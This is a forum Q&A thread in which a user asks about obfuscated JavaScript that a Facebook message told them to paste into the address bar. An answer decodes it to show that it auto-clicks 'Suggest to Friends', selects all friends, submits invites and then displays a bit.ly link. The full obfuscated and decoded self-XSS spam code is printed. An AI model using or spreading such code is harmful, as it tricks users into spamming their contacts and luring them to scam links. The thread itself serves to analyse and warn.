Javascript in the address bar - is this malicious?

Question

I got a message on Facebook telling me to copy and paste this into my address bar. I thought I'd post it here and see what everyone thinks about it. What does it do? How does it work?

Here's the source code:

// (DO NOT DO THIS!)
Javascript:var a=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x64\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x61\x20\x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22\x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61\x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x31\x32\x36\x38\x32\x36\x39\x35\x34\x31\x38\x35\x32\x33\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74\x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61\x3E","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"];
void (document[a[2]](a[1])[a[0]]=a[3]);var ss=document[a[2]](a[4]);
var c=document[a[6]](a[5]);
c[a[8]](a[7],true,true);
void (ss[a[9]](c));
void (setTimeout(function (){fs[a[10]]();} ,4000));
void (setTimeout(function (){SocialGraphManager[a[13]](a[11],a[12]);} ,5000));
void (setTimeout(function (){
document[a[2]](a[1])[a[0]]="\x3C\x61\x20\x68\x72\x65\x66\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x62\x69\x74\x2E\x6C\x79\x2F\x62\x54\x6C\x30\x76\x6A\x27\x3E\x43\x6F\x6D\x70\x6C\x65\x74\x65\x64\x21\x20\x43\x6C\x69\x63\x6B\x20\x68\x65\x72\x65\x3C\x2F\x61\x3E";
} ,5400));

Answer 1

Here is the formatted source:

var a = ["innerHTML", 
         "app4949752878_app4949752878_dd", 
         "getElementById", 
         "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>",
         "suggest", 
         "MouseEvents", 
         "createEvent", 
         "click", 
         "initEvent", 
         "dispatchEvent", 
         "select_all", 
         "sgm_invite_form", 
         "/ajax/social_graph/invite_dialog.php", 
         "submitDialog"];

void (document[a[2]](a[1])[a[0]] = a[3]);
var ss = document[a[2]](a[4]);
var c = document[a[6]](a[5]);
c[a[8]](a[7], true, true);
void ss[a[9]](c);
void setTimeout(function () {fs[a[10]]();}, 4000);
void setTimeout(function () {SocialGraphManager[a[13]](a[11], a[12]);}, 5000);
void setTimeout(function () {document[a[2]](a[1])[a[0]] = "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>";}, 5400);

The a array holds all strings used by the code.
Here it is with the strings put back in place:

void (document.getElementById('app4949752878_app4949752878_dd').innerHTML =  "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>");
var ss = document.getElementById("suggest");
var c = document.createEvent("MouseEvents");
c.initEvent("click", true, true);
void ss.dispatchEvent(c);
void setTimeout(function () {fs.select_all();}, 4000);
void setTimeout(function () {
    SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
}, 5000);
void setTimeout(function () {
    document.getElementById('app4949752878_app4949752878_dd').innerHTML = "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>";
}, 5400);

Finally, here it is with decent names and structure:

var messageElement = document.getElementById('app4949752878_app4949752878_dd');

messageElement.innerHTML = 
    "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>";

var suggestLink = document.getElementById("suggest");
var mouseEvent = document.createEvent("MouseEvents");
mouseEvent.initEvent("click", true, true);
suggestLink.dispatchEvent(mouseEvent);


setTimeout(function () { fs.select_all(); }, 4000);
setTimeout(function () {
    SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
}, 5000);
setTimeout(function () {
    messageElement.innerHTML = "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>";
}, 5400);

Answer 2

I always find this sort of thing interesting because it shows various ways people use to try and get around security or entice others to do something stupid.

My "Golden rule" is that things like this are always something very dodgy and best ignored. Nothing legit requires this sort of hacking, at the very least it probably contravenes some site policy. At the very worst you get hacked and your computer or online identity used and abused or your bank accounts drained.